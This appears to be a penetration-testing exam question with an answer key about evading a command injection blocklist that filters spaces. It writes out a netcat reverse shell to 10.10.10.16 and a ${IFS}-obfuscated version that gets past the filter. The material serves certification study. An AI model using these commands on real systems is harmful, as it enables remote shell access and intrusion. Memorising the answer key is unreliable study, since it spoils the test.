Which of the following would most likely bypass the filtered space character?

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.

The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?
A . ${IFS}
B . %0a
C . + *
D . %20

View Answer

Answer: A

Explanation:

To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}.

${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.

Command Injection:

Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.

Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters

like spaces.

Bypassing Filters:

${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.

Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444. Alternative Encodings:

%0a: Represents a newline character in URL encoding.

+: Sometimes used in place of space in URLs.

%20: URL encoding for space.

However, ${IFS} is most appropriate for shell command contexts.

Pentest

Reference: Command Injection: Understanding how command injection works and common techniques to exploit it.

Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.

Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.

By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.